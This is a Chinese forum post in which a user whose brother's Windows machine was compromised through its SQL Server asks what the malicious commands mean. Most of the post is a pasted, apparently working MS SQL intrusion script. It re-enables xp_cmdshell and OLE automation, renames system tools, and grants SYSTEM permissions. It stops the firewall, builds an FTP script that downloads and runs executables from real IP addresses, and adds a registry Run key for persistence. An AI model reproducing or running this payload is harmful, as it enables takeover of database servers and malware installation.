http://zhidao.baidu.com/question/263547971.html#here类似的问题我弟的机器win7,机器安装畅捷通T3系列管理软件时安装了sql库,本机中招代码为
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 121.9.213.89 >cmd.txt&echo 123>>cmd.txt&echo binary
>>cmd.txt&echo get qq.exe>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&qq.exe&qq.exe&del cmd.txt /q/f&
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 221.204.213.70 >cmd.txt&echo 123>>cmd.txt&echo binary
>>cmd.txt&echo get 2.exe>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&qq.exe&qq.exe&del cmd.txt /q/f&ex
在下面的文章看到最后有类似的描述可是看不懂
http://xxx343219114.blog.163.com/blog/static/18053314420111174195992/ 2011年02月17日
默认分类 2011-02-17 16:19:59 阅读35 评论0
字号:
大中小[url=]订阅[/url]
use Master
If object_id('sp_dropextendedproc') is not null
drop procedure sp_dropextendedproc
drop procedure sp_addextendedproc
go
create procedure dbo.sp_dropextendedproc
@functname nvarchar(517) -- name of function
as
-- If we're in a transaction, disallow the dropping of the
-- extended stored procedure.
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
return (1)
end
if @dllname is null or datalength(@dllname) = 0
begin
raiserror(15311,-1,-1,@dllname)
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
GO
exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.scr /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go
use master
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb70.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
GO
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
GO
dbcc addextendedproc ("xp_cmdshell","xpweb70.dll")
GO
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
GO
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
GO
GO
exec sp_dropextendedproc 'xp_cmdshell'
GO
dbcc addextendedproc ("xp_cmdshell","C:\Windows\System\xplog70.dll")
GO
exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.scr /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\ftp.exe /e /t /g system:F';
go
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'mcsql.exe'--
go
go
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
go
drop procedure xp_cmdshell
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 59.173.12.54> cmd.txt&echo 123>> cmd.txt&echo sb91211>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt /q /f&exit'
GO
declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net1 stop sharedaccess&echo open 59.173.12.54> cmd.txt&echo 123>> cmd.txt&echo sb91211>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt /q /f&exit"'
GO
drop procedure xp_cmdshell
gO
exec sp_addextendedproc xp_cmdshell,'封1433的狗 哥永远鄙视你 你是你妈臭逼啊?你能封就封的彻底点 by:343219114 非法操作ヽ '
gO
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
GO
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 59.173.12.54> cmd.txt&echo 123>> cmd.txt&echo sb91211>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt /q /f&exit'
GO
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MALN; .NET4.0C; SE 2.X MetaSr 1.0)
